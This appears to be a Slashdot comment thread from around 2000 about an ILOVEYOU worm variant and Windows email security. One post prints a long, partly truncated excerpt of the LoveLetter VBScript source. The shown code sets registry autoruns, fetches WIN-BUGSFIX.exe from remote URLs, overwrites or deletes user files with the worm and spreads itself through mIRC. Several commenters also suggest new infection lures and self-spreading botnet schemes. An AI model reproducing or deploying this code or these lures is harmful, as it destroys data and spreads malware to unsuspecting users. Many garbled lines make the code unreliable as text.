It helps to thin out the herd. What you want is a more or less constant nonzero low probability of catching and incurring damage from one worm/virus/trojan or another. This will serve to harden the resistance of the community and cull out the weaklings. Just like in the solid world the most destructive virulent phages do not have the best logevity because they kill too many of their hosts too quickly. Ergo the liklihood of some super Marburg or Ebola with 97%+ mortality spreading all over the world is rather low. Of course the garden variety with 70%+ mortaility is none to good either. OTOH a continual exposure less virulent forms of other types of phages actually hardens both the individual and the community leavingit better prepared to resist the next variant. Exhibit the indigenous peoples of the Americas in the 15th-16th C. exposed to Smallpox for the first time. Infected populations decreased by 90% in <10 years whereas the Europeans were already largely resistant and could survive even many epidemics with <25% mortality.
So it is with a dynamic community of computers. Somebody who doesn't have a scanner will die. Somebody who rarely updates the sig files will die. Somebody who doesn't think it can happen to them will die. Someone who doesn't pay attention and goes on as normal will die. Somebody who is more thorough and less trusting or ignorant will survive. Remember not all of these screaming headlines are about viruses at all. They are simply a matter of benhavior and social engineering. Do you think as many people would have been infected if the ILY worm had a heading that said "opening this note will destroy or damage your machine and the machines of everyone in your addressbook." OF course not.
Which leads me off in another tangent. How to get more people to open destructive messages since everyday we're more jaded and suspicious? Well if I was a badguy what I'd do is use the message header to refer to some online purchase. Sure, if you didn't buy anything then you'd be less likely to open the message but the people who did would probably open the message approaching 100%. So what is a poor website to do? It seems that one avenue that should be pursued for this and for eComm generally is a way to generate a CRC at the point of purchase and then send the confirmation/receipt with the CRC in the header so that before you do anything you manually cross check the numbers to insure they match. Or something like that. I guess I'll stop blathering now.
I've been using NT4 since it came out, and I didn't have the slightest idea that QBASIC was in there. I know QBASIC is not the world's greatest programming language but it sure beats nothing at all. And I can assume it is on every one of the NT machines at my office.
I gave up on BASIC about ten years ago when I realized that I had learned at least nine versions of it (including Timex-Sinclair BASIC and Wang BASIC-2), and none of them had anything in common; if you wanted to write something in BASIC #9 all that knowing BASICs #1 through #8 did for you was confuse the Hell out of you. But if there's a programmming language already installed by default on every PC in the office, I guess I'm going to have to brush up my QBASIC skills again. Thanks a million, greenrd, for this unexpected piece of good news!
I'll bet MS took it out of Win2K, though.
Yours WDK - WKiernan@concentric.net
Check out the virus warning I recently came across:
Pay close attention to this warning!
If you receive an email entitled "Bad-times," delete it immediately. Do
not open it. Apparently this one is pretty nasty. It will not only erase
everything on your hard drive, but it will also delete anything on disks
within 20 feet of your computer through the use of subspace field
harmonics. It demagnetizes the stripes on ALL of your credit cards. It
reprograms your ATM access code, screws up the tracking on your VCR and
uses subspace field harmonics to scratch any CD's you attempt to play. It
will program your phone auto dial to call only your mother-in-law's
number. This virus will mix antifreeze into your fish tank. It will drink
all your beer. (For God's sake man are you listening?) It will leave
dirty socks on the coffee table when you are expecting company. It will
replace your shampoo with Nair and your Nair with Rogaine, all the while
dating your current boy/girlfriend behind your back and billing their
hotel rendezvous to your Visa card. It will cause you to run with
scissors and throw things in a way that is only fun until someone loses an
eye. It will rewrite your backup files, changing all your active verbs to
passive tense and incorporating undetectable misspellings, which grossly
change the interpretations of key sentences. If the "Bad-times" message
is opened in a Windows95/98 environment, it will leave the toilet seat up
and leave your hair dryer plugged in dangerously close to a full bathtub.
It will not only remove the forbidden tags from your mattresses and
pillows; it will also refill your skim milk with whole milk.
*********WARN AS MANY PEOPLE AS YOU CAN.*********
Hope I don't get that one.
http://crummysocks.com
Viruses do not have to have a destructive payload. One could create a virus that was self-replicating and benificial. Also their is the challange of creating one. Why climb a mountain? Because it's there. Why write virus code? Because one can.
The challange of writing self replicating code in any language from scrap is just to large for any self respecting hacker to ignore. That is not to say that one should create a destructive virus and release it, but creating a nondisrtuctive self-replicating program for proof of concept purposes is ok.
I've examined the source code to many viruses and most are crap. Only a few are true works of art. Most of these came from Bulgaria and they incorporate features that are truly interesting like stealth and the ability to hide changes in file size and memory used.
Environmentalists are their own worst enemy. ~tricklenews.com
...but only because I'm a coward.
If I was absolutely sure I wouldn't be caught, I'd be putting out viruses to beat the band. Why? Many reasons:
-to see if I can
-to point out security problem in a dramatic manner
-"tough love"
-how does a given virus spread and to whom?
-what can I make a virus do?
As an example of this last one, I was thinking of a hypothetical virus in the shower this morning. The virus is non-malicious. It just installs a daemon on your computer. But the daemon is like a distributed.net client. So once it got propagated pretty good, I could submit tasks to these daemons and get answers back. Pretty neat, huh? Now make the daemons talk to each other. Make them pass MP3s (and DeCSS) back and forth. Hey! I've re-implemented FreeNet! If you read Slashdot you have to admit this idea intrigues you.
BTW, I would do this all anonymously. I wouldn't be in it for the attention. Just the intellectual stimulation.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I LIKE IT!
:)
We're genetically engineering bacteria to eat oil spills, and designing cancer cells to secrete insulin. We're cloning sheep and making real viruses to attack malignant tumors.
Somehow, the symmetry of a worm that scours the Internet exploiting M$ security holes in an effort to fix them is.. poetic. Sort of like autonomous garbage collection.
Arguably, any virus/worm that deletes Windows system files is already trying to do this; but in a very heavy-handed way. A lighter touch is called for. Disabling the registry settings that allow auto-invokation of scripts attached to email is one good way to make the world a better place.
And hey! How could anyone (besides Micros~1) get upset over a benevolent virus?
Maybe it could even open a pop-up on the screen every 20 minutes, to remind the user to stretch their hands to prevent RSI?
Maybe it could replace the talking paper-clip with a talking Penguin? "I see you're trying to write a letter. Wouldn't you rather write it on actual paper, and add some humanity to your interpersonal communicaton?" "I noticed your key-stroke rate drop over the last hour. You seem tired. Shall I have some pizza delivered?"
-- What you do today will cost you a day of your life.
Next thing: Murder as art...
Raymond Chandler considered murder to be art, his art. This is a cool little book.
Yours WDK - WKiernan@concentric.net
(I hope somebody reads this, I'm posting it too late...)
Everyone from the clueless media to Slashdot's "experts" have been warning people about how bad Outlook's "security" is, and how anyone can send you an email that will make your computer explode. I've been one of the few people struggling to point out that ILOVEYOU was a trojan, not a virus; it cannot run when you read an email, it can only run if you launch the executable attachment.
But the media has been telling everyone to "delete any email with X/Y/Z in the subject line before even opening it!" Whenever I complain that that's not necessary, the response is, "Better safe than sorry."
Well, spreading false information in the name of "better safe than sorry" is almost never safe. That advice is useless against this new program. On the other hand, if folks had spent the past two weeks telling people that protecting against trojans is the user's responsibility, not Outlook's, then this new variant would be a non-issue.
Granted, the false information on Slashdot has probably had less of an impact on the public's misunderstanding of the issue than the false information being spread by CNN, NBC, etc. But considering that Slashdot is (by and large) a community of experts in the field, I think we should be providing some sane leadership, instead of helping the hysteria along.
MSK
I have yet to receive this e-mail worm, so I'd be very interested in seeing the VBS source.
--
"Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
I'm CTO of a Company in NYC..we are a 100% (OK..99%..our graphic artists insist on Macs) Linux based company. Our secretary uses Kmail...she had ZERO problems learning how to use it.Anyone can use Linux. I'm not talking about installing..but using it. I set my mother up(who is 59) with Linux....Set her up with StarOffice, Gnomeicu and even Laim.....she's happy as a clam and hasnt had a problem (meaning she hasnt called me for help)
If you're not a Liberal in your 20's, then you have no heart.If you're still a Liberal in your 30's you have no brain.
the OS everytime some idiot decides an epidemic?
.vbs to each of these files. Because of this, no removal is possible once the worm has activated. This document will be updated as new information becomes available.
This is what I found at symantec's website:
How to Repair
You will need to restore from a full backup, or, if that is not available, reinstall all software, including the operating system, and then restore data from backup. This worms deletes the contents of all files on the system, leaving the affected files with a byte length of zero. This effectively destroys all files on the system, and will render the computer inoperable. The worm also appends the extension
bwaaahhhaaaaahahahahahahaa
And to those who are claiming that "virus" is just as correct: I agree that the meanings of "hacker" and "cracker" are blending. However, these two terms are technical, not social. Definitions of technical terms are specific, based on certain criteria, not on the vagaries of public usage, much like the common misunderstanding between codes and ciphers.
The fact that most people don't understand the difference doesn't mean that the difference doesn't exist.
"You can never have too many elephants on your team."
The worst thing about this is that since Windows hides file extensions by default, many users don't even know what a .vbs file is. IIRC, when ILOVEYOU went around, the "warhead" file was actually named iloveyou.txt.vbs or something of the sort, so most users (those with filename extensions hidden) would see iloveyou.txt and not think twice about it.
I took care of this by creating an empty text file, changing the extension to .vbs, and sending it around the company so that everyone could see what the icon for the file looks like, regardless of what the filename appears to be.
Aero
We can believe in you for 3 minutes, but beyond that, even the King of All Cosmos can't be expected to wait.
The idea of a paperclip wagging its finger at me, left me speechless the first time I saw it... Wasn't there a notice recently that someone found a scripting hole with said paperclip?
There is a name for what Microsloth is doing when it builds worm encouraging products: Breach of Professional Duty -- they are supposed to know better.
Yea, they yammered "the customers want this"... A former BBC managing director said it best: "We know precisely what they want, and we will not give it to them". Like "Fiduciary responsibility" demanded of those that manage others money, if you know that something is truly stupid, you are required to say "NO". You are the expert, they are the common man. (take my retirement money and buy tulips...)
If I were a 14yr old kid learning VBscript, when I read the bit about embedding in email, I would feel moraly obiligated to write a worm to exploit it. The grownups should know better.
Organizer:New England Rubbish Deconstruction Society;The NERDS,first US team in the UK Scrapheap Challenge/Junkyard Wars
If a system was designed so that no process could read its own executable file, would this prevent viruses from working?
Okay, I've got no idea about whether this would break other applications, or whether there wouldbe a way around it. Might work though.
*i* (and many other /.ers) use pine.
slaves.
remember, these virii are only propogated by the widespread use of software that equates to welfare for IT/MSCE's.
--ze, who needs more caffeine to work out the morning crankies
I don't dress this way to be scary. I dress like this because it's easier to sort my laundry. "...black...black...blac
>Anyone that thinks Linux is immune from virii is a moron. These are
>just simple attachments that dumb people run on their machine. People
>can run attachments on any OS, folks. It's the USERS that are stupid,
>not the client or the OS.
Use Mutt or Pine on Linux/Unix and then say that.
there must be another way to convert micro$oft users to linux than a deadly virus?
I agree that it is not an OS issue, (assuming the OS does not allow you to modify system or other users files, i.e. Not Win9x). But I think it is a client, rather than user issue.
Code coming from an unverified source (i.e. not from a trusted installer) should not be allowed to run outside a sandbox. It works fine for Java on the web. The same treatment should apply to anything coming in an email.
Furthermore, any file extracted from an email should be marked non-executable. (The user can chmod it - if they know enough to do that, they can probably understand the risk). Archives are a bit more tricky, but changing umask(2) to 666 before invoking an archive program (such as tar) should do the trick I guess.
The Evolution folks are implementing a Visual Basic clone in their new gnome client. But they are doing it properly, using a Java-like security model.
Has anyone considered blaming Netscape and Sun for the even greater, incremental loss of money from JavaScript? How many billions of dollars in coding, design, and bandwidth have gone into popup windows, status bar theft, and rollovers?
Perl is such a spirit fouling venture that there is even a monastic commune for people who grok it.
bash scripting is by far the greatest sin, for it mimics C in an almost mocking way -- K&R would not be pleased...
--
--
E2 IN2 IE?
Viruses infect other executables, such that the original functionality is still there, but the viral code is executed when the program is first run, which gives it a chance to spread to other executables and/or become resident in memory.
Worms, on the other paw, are self-contained programs which contain nothing but the worm itself.
The definitions of these things are hardly new, they have been around for YEARS. I suggest reading section B2 of the comp.virus FAQ for more information.
I've already got more than enough copies of the old one. =)
As an example of this last one, I was thinking of a hypothetical virus in the shower this morning. The virus is non-malicious. It just installs a daemon on your computer. But the daemon is like a distributed.net client. So once it got propagated pretty good, I could submit tasks to these daemons and get answers back.
[...]
Hey! I've re-implemented FreeNet!
Sounds more like you've re-implemented DDoS.
Interested in learning Chinese or Japanese? check out Chinese/Japanese-English Dictiona
This functionility dose not extend back to Dos days.
In essense you are right. It dose not matter where the hole is located.
It could be in the web browser.. just as bad... hay an FTP client that executes files... ohhh death...
Even if the hole was in Napster...
However no mapping applications wasn't posable back in Dos days.
You may be thinking of when BBS Sysops could turn ANY application into a "door" accessable to anyone. All it's features.. including dos shell...
Sysops who mistakenly installed apps with Dos shell as doors had a back door similer to the one used by the e-mail virus.
However Dos back doors were installed by experenced hackers by hand. They did so not fully aware of just how many applications had dos shell support.
This happend to me when I stalled DosHack. Of all things a Unix game ported to Dos could shell to Dos. Amazing...
This kind of problem can show up on ANY system. Dos, Unix, Windows, etc... It's installed by an expert who should know better.
It dosn't happen as often.. given that today it's SysAdm who have security issues crapped up the bum.. vs Sysops whos idea of security is running the BBS on a spare computer.
However this defect was installed by Microsofts plug and play design. There isn't a Dos varient.
Side note... if this problem WAS found in MsDos would that absolve Microsoft? Or would it just give Microsoft a ferther history of neglect?
Also MsDos isn't a networked system.. Security by no access... Thats security not even Unix can provide... With the apparent side effect of being a pain to get on-line
I don't actually exist.
What does VBS stand for again? Isn't it "Virus Broadcasting Script" or something like that? 8-)
Adrian
Many moons ago an if condition was messed up and extrans was the same as plain text.
:-)
When the slash code came out, the first thing that I did was went to make some fixes to bugs in plain text that had been bugging me for ages. While I was doing that I noticed the mistake in the if condition and made extrans be what it was advertised to be also. The patch was accepted.
Amusingly, any Python fans
who find that indenting works
have a Perl bigot to thank.
(Namely me.:-)
Cheers,
Ben
My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
I'd like to add, however, that most computers are single-user devices now and there aren't typically "other users files" on your computer.
That is true of most office computers or home computers of single people, but far less often true of home computers that are used by a couple or a whole family. Some offices have some people sharing computers for various reasons (shift-splitting, receptionists, etc), so the statement isn't 100% true in the office world either.
I also read somewhere that with Win2K it's not possible to overwrite system files.
Its less likely under Windows 2000, supposedly even more so than NT, but most desktop users are using Windows 9x, and the upgrade path for most of those people for the immediate future will be to Windows ME, as Windows 2000 is not really targeted at that audience.
(although I suppose a virus could just as easily destroy non-system applications).
Very true. Unfortunately, security in the Windows world is normally set so that any user can write into program files.
rem barok -loveletter(vbe)d ow r osoft\Windows Scripting Host\Settings\Timeout") ) r rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs" r rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs" r osoft\Internet Explorer\Download Directory") j kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe" d jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" p Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe" B mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe" r rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe" i ni") /if ( $nick == $me ) { halt }" /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
You know the law that lets people sue you if their kids drown in your swimming pool, if you don't have a fence or anything?
It occurs to me that leaving a gigantic security hole in a system with millions of users is roughly similar. After Melissa, I think we knew about this, and I think Microsoft could have actually fixed the problem.
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
Not really. I don't believe that perl scripts need execute bits set for "perl " to run them. So if someone were to write a unix mail client that automatically ran "perl " on attachments where has a .pl extension, it would be rather dangerous.
That is true, although as far as I know there is no such mail program, and it is highly unlikely that one with such an obvious security flaw would ever become popular in the Linux world.
Of course, I'm increasingly an advocate of using CVS for *any* project that involves extended development time, which would save the user's ass if such a thing happened on unix. But AFAIK, VC tools aren't really ready for nonprogrammers, just yet.
You might want to check out gCVS and/or Cervisia, which are (Gnome and KDE respectively) GUI based front ends for CVS. They are both rather recent products, but they do give a more point-n-drool user interface to CVS.
That is a very interesting task anyway, I'm sure any programmer ever thought about it (I did). Fortunately not every one realise it. And after you realise it, you would like to try it "only in this little network". Then it's too easy to loose control on it. At least most captured virus creators say so.
as long as you aren't running attachments from root, how much damage could such a virus do?
---
I post links to stuff here
So, here's my theory: Symantec and NAI, et al., are largely at fault for this one.
They put out a band-aid. Because there was a band-aid, millions of computers were not actually fixed. So, thanks to the anti-virus companies, people whose systems are still quite vulnerable *THOUGHT* they were safe.
If, instead of shoving out a band-aid, they had said "this isn't something virus software can stop, you need to turn off your scripting host", millions of people would not just have lost days or weeks of work.
Isn't that weird? Half-assed solutions don't really work.
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
Thanks a lot. You just fucked up my entire system. I'll be digging through a backup tape for days. :-(
We're going down, in a spiral to the ground
"Intelligent mail client users continue to be unaffected" written by our CmdrTaco is brillant one liner that really sums up this whole thing. Somewhat ironic if you think about it, Outlook is supposed to be more intelligent than some terminal program like PINE but that is not the true case. I guess the idea that idiot proofing only allows idiots to be dumber is somewhat true- a slick graphical program is sometimes just more overhead. Just to throw this in "The ILOVEYOU sympathy virus has been annoying the heck out of us for days now... it works on the honor system: Please delete some files and mail to all your friends" still requires root access for damage equivlant to our MS Windows. Little old me can't delete random parts of glibc with my account, even after I spend hours learning how to use rm ("rm -rf" is so nice) and mastered the idea of wildcards to achieve some randomness.
No, I'm a student =)
.vbs worms first hit.
One of my workterms standardized into outlook though, and I could only imagine what happened when
Someone ought to do a statistical analysis of the worms distribution patterns, and come up with some real interesting numbers.
One question that begs to be answered: is how much email was being sent in your corporate network?
If all@blah.com contained HUNDREDS of addresses, and HUNDREDS of people were clicking on a message at around the same time, this could lead to a quite exponential flow of email traffic.
I would imagine if it ever went this high, the email server(s) would just not handle the load.. or, in a worst case, the network could not handle it? (that would be a hell of a lot of exponential growth)
Or, was it shut down to merely stop people from losing data (perhaps)/ stop all the phonecalls to the helpdesk, etc etc.
I've found pine to be easier to use and more powerful than the graphical user interface mail clients. With the recent rash of destructive viruses I would now add pine being more secure to this list. I can also access my mail from any where via a simple telnet or ssh connection.
Far be it from me to make a fuss over /. moderation, but the parent message to this, though it is marked down to -1 (troll), really wasn't. Since it may have fallen out of sight, I quote it:
(a) Outlook doesn't modify any files -- Windows does. On NT, no system files can be modified.
But Outlook is so tightly integrated that the distinction is moot, synergy, innovation, blah blah blah... Anyway so I heard you have to make \WINNT\SYSTEM32 accessible to all MS Office 97 users. If it is in a FAT partition you're screwed anyway, security-wise (on the otherb hand you can come up in MS-DOS and fix things), but even if your system drive is an NTFS partition, so you can lock down the \WINNT\SYSTEM32 directory for users, for some ungodly reason Office 97 must write data there so you can't. That's what I read somewhere, and if I'm wrong, please correct me.
(b1) No version of the ILOVEYOU virus executes from the preview pane.
At the instant our AC posted this, it may or may not have been true, and it may or may not be true at the present moment. But if it's possible at all to write vbs code which self-executes in the Outlook preview window, some funloving so-and-so somewhere is busy tonight shoehorning it into the framework of ILOVEYOU - an world-girdling open-source virus in plaintext, proudly signed by the author no less! Gotta love those Filipinos, you know Lynda Barry's candid like that too.
To tell you the truth, to make it automatically self-actuating would take something away from the complexity, elegance and depth of this worm. As curious as the technical details, all generously laid out for our inspection, may be to a casual aesthete appreciating the art of virus composition, the social-engineering aspects of worms like Melissa and ILOVEYOU is even more interesting; it adds an additional depth to the process of propagation if the virus must somehow inveigle or seduce a human user to play a part in its reproductive cycle. At least I think so.
(b2) With a policy file, an admin can force all workstations in a domain to show file extentions.
I'd be interested in you telling me how that's done. It's always been a minor irritation to me, that, and I've got a whole office-full of NT desktop machines and users who jump from one machine to the next.
Yours WDK - WKiernan@concentric.net
Call the application dumb cos it overwrites files, not the OS
If you were installing something as root, and it overwrote your kernel and shared objects and stuff, you wouldn't be blaming Linux, would you?
This kind of prejudice is sooooooooooooooo Linux.
The thought of creating some self-reproducing artificial lifeform and releasing it into the environment to see how it survives is just cool. Make it self-modifying and see if it can adapt and expand to fill it's ecological niche before the predators devour it. It's the temptation to play god on a grand scale.
Of course you can get the same thrill with genetic algorithms and a-life, which is why I've never succumed to the temptation of the Dark Side myself, but the draw is still there...
Read a good book lately?
Read a good book lately?
Some of this has been said by other's in this thread already, but I'll try and be short.
.txt file", so they just click through all the dialog boxes. (Correct me if I'm 100% wrong here. I haven't verified this, just writing from memory of the one time in my life I used Outlook on a new machine.)
1) Not all people who get hit by this are actually stupid, they're just victims of bad windows design and made the mistake of trusting the people who designed their software... and have been trained to habitually click through a bunch of dialog boxes if they want to get their work done some time this millenium.
For example, the DEFAULT in windows is to "Hide extensions of known file types." I've always thought this is the most ridiculous option ever, since tiny icons are NOT intuitive, and even Windows friggin 2000 is still 100% trusting of file extensions for file types. What happens here? Well, they get a file attatchment on email that is named ILOVEYOU.TXT with an icon that symbolizes a VBScript, which they don't recognize. They hear their geek friend saying, "You can never get a virus from a
2) Even though it's possible to be multi-user safe in W2K, it isn't the norm. Windows as a multi-user platform sucks! Even Windows 2000. There is no such thing as a root shell. This means, whenever a user needs to do something that requires Superuser priveleges (like installing a font pack for IE), they must stop everything they are doing and log out, then log back in as Administrator. Sometimes this even involves bugging IT to do it for you (and even the worst MCSEs get bored installing font packs all day because someone sent a URL to a joke on a site in Israel to the whole company). A few pyschological penalties like this, and people just end up giving their normal user full priveleges.
3) Users are conditioned to just click-through everything. This isn't a Windows-only problem. I would say it's mostly Microsoft's fault, since they "innovated" the modern EULA as well as overuse modal dialog boxes. "To use this software you must agree to this 5-page EULA written in lawyerese and for some reason contained in a 20x20 scrollbox with tiny font. (Yes, I agree | No, I don't want to use this software I've already paid for)" "This page requires a plugin of type text/vbscript-hard-drive-eraser. Install now? (Yes | Yes | Yes | No)".
So, when the user gets "Attatchments may contain executable code [insert sound of adults talking in Charlie Brown]", they habitually just click yes. This is reinforced when they were a new user and they were frigthened by a threatening dialog box like "Unable to connect to host. Connection reset by peer", so they asked for help. The lab tech who came over says, "Oh for heaven's sake, just click OK and try again."
[#include apologies_for_wordiness.h]
If you are a paranoid unix user, you need only have an e-mail account that is NOT the account you use for usual work and have xbiff/whatever monitor that mailbox. A quick su to your email account (in a script or in kbiff or whatever) will allow you to read and send e-mails but the very worst a virus could do would be to delete any e-mails you hadn't copied to your real account. All automated and transparent!
When Melissa hit, the big "X" got slammed... HARD! One reason is because, the first address in everyone's address book was "all@corpname.com, so there were literaly hundreds of thousands of emails being sent. Compeletely shut down the mail system for the better part of the day.
When I checked my outlook queues later, I found a couple hundred copies of Melissa in the deleted folder. But, the funny part was, with the filters the Unix sysadmins put in place, not a single copy made it through to my Unix address!
Live and learn.... hopefully.
-- Your Servant,
Your Servant, B. Baggins
Perhaps now people will realize that running in Windows dumb mode (without the last extention) is really stupid. I haven't found anyone who does something real with their computer to find dumb mode useful. Perhaps new versions of Windows will not have dumb mode as the default.
Or perhaps not.
I am a bad speler. Please ignore speling meestakes in me poast.
"Intelligent mail client users continue to be unaffected "
I assume by this statement you mean those not running windows e-mail clients?
-D
"I'm a slave of Karma, Spin the Wheel and I'm a king reborn."
With windows being the most predominant OS and the virus specifically targetting that base, why should other computers get pulled into this messy game. Every computer illiterate (ok not savvy) person who listens to this "Computer bug (or whatever)" they think it is universal and applicable to everything because it happened to more than one person. What they dont understand is it did not happen on all the million mainframes, HPs, Sun, VAXs, Alphas and Linux machines. It happens only on Windows machine - So let us start terming the bug as a Windows bug or Windows virus instead of a generic computer bug. This goes a long way in getting the mindset of people that if you want to be on the Internet use a secure OS - Mac, Beos or Linux pick your choice.
I probably shouldn't post this, because I'll give virus writers some new ideas. But hell, this is /. and I'm going to do it anyway.
I'm also posting this so admins can watch our for it incase a virus writer gets the idea anyway.
Although we had problems with vbs. But thinking back about the Melissa virus coming from a word document. I fear that someone will write a virus that instead of reading you address book, read your inbox, and then send a reply back to all those that have sent you mail. This seems to be more likely something that people will open.
I'm basically forced to use Outlook at work (at home I use pine and netscape) but I deal with documents all day. I constantly mail, forward and reply word documents to my colleagues. But if i receive a reply from someone with a word document, I'm more likely to open it (although I do have macros turned off).
Just a fear of mine, and hopefully there's a solution before there's a virus.
Steven Rostedt
Steven Rostedt
-- Nevermind
Someone on one of the mailing lists I'm on half-jokingly suggested that the next obvious step for ILOVEYOU would be dynamically generated content. Little did anyone suspect that it would actually happen. I say the next step is a -- ooh, I got it! -- a version that has it's payload as a message warning about the dangers of Outlook viruses, in effect describing what it's doing to you while doing it.
It's all fun to joke about as an academic exercise, but this is really gonna mess people up. My boss tells me I'm free to set up an Outlook Express account here, but I'm happy to just forward my mail to my pine account. Ascii doesn't scare me, I see no reason to ditch it...
DO NOT LEAVE IT IS NOT REAL
As has been thoroughly hashed out in the threads of the articles following the last virus/worm outbreak, Linux isn't 100% immune from viruses/worms, but it is much more resistant due to a few reasons:
First, executability is determined by access bits, not by file extension. This means that normally downloaded files like attachments get saved un-executable, meaning that users have to intentionally try to change the access bits on the files to execute them, not just click on them.
Secondly, unless the root user is the one reading the email and running attachments, the virus/worm is limited by security/permissions rights to what it can do. While it can do damage to a single user's files, it can't very easily blast other user's files or system files. On Windows 9x, there is basically no security, so viruses/worms like ILOVEYOU are free to twink with the registry, etc.
Thirdly, the homogenous nature of the Windows world makes it a much easier and more attractive target for virus/worm authors. It is pretty safe to assume that virtually all Windows 9x clients will have Outlook and all the associated DLLs on their system. There is no single email client in the Linux world that is so ubiquitous. That makes it more difficult to write viruses/worms that will affect a large percentage of Linux users because the virus/worm creators can't make the kind of assumptions about how to read things like address books, etc. that they can under Windows. This is unlikely to change any time soon, because the Linux world is much more diverse than the Windows world.
While you are right up to a point that in many ways it is the users that are stupid, Outlook and Windows make the problem worse by making it so much easier for the users to shoot themselves in the foot. And to a certain extent, Windows is plagued with a much higher percentage of stupid users because it intentionally caters to the least common denominator. To a certain extent, as Linux gets easier to use, it may start to see more of the semi-stupid users.
Every time there is virus that paralize our email server it is always on a fryday! So when I want to reach my friends to plan the week end I have to use... The phone !!??
So to the peoples who makes those virus, could you possibly do it on a monday next time.
Thank you kindly.
Imagine, if you will, a time in the future when a Win2K sysadmin is reading mail while logged in to Active Directory with an administrative level ID (big no no)
